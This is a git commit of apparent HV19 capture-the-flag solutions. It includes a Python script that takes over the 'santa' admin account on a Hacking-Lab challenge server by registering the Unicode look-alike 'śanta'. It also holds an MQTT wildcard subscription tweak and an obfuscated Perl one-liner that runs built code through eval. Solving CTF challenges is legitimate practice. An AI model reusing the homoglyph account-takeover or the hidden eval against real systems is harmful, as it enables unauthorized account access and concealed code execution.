Day17 code

2019-12-29 15:24:39 +01:00 · 2019-12-29 15:24:39 +01:00 · 5267a8d008
Commit 5267a8d008
--- a/15/exploit.py
+++ b/15/exploit.py
@ -7,7 +7,7 @@ import logging

 def on_connect(client, userdata, flags, rc):
    if rc == 0:
-        path = 'HV19/#';
+        path = 'HV19/gifts/#';
        client.subscribe(path, qos=0)

 def on_message(client, userdata, msg):
--- a/16/decode.py
+++ b/16/decode.py
--- a/17/exploit.py
+++ b/17/exploit.py
@ -0,0 +1,33 @@
+#!/usr/bin/python
+
+import requests
+import random
+import string
+import re
+
+BASE_URL = "http://whale.hacking-lab.com:8881"
+PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
+SESSION = requests.session()
+FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
+
+# 1. register user santa
+res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
+if res.status_code != 200 or "Registration successful!" not in res.text:
+    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    print(res.text)
+    exit(1)
+
+# 2. login
+res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
+if res.status_code != 200 or "username not found or wrong password!" in res.text:
+    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    print(res.text)
+    exit(1)
+
+# 3. get flag
+res = SESSION.get(BASE_URL + "/admin.php")
+if res.status_code != 200 or "username not found or wrong password!" in res.text:
+    print("Server returned: %d %s" % (res.status_code, res.status_text))
+    exit(1)
+
+print(FLAG_PATTERN.search(res.text))
--- a/17/source.phps
+++ b/17/source.phps
--- a/04/input.pl
+++ b/04/input.pl
@ -0,0 +1 @@
+s@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\x20\n^&&s[(.)(..)][\2\1]g;s%4(...)%"p$1t"%ee
				`@ -0,0 +1 @@`
				`s@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\x20\n^&&s[(.)(..)][\2\1]g;s%4(...)%"p$1t"%ee`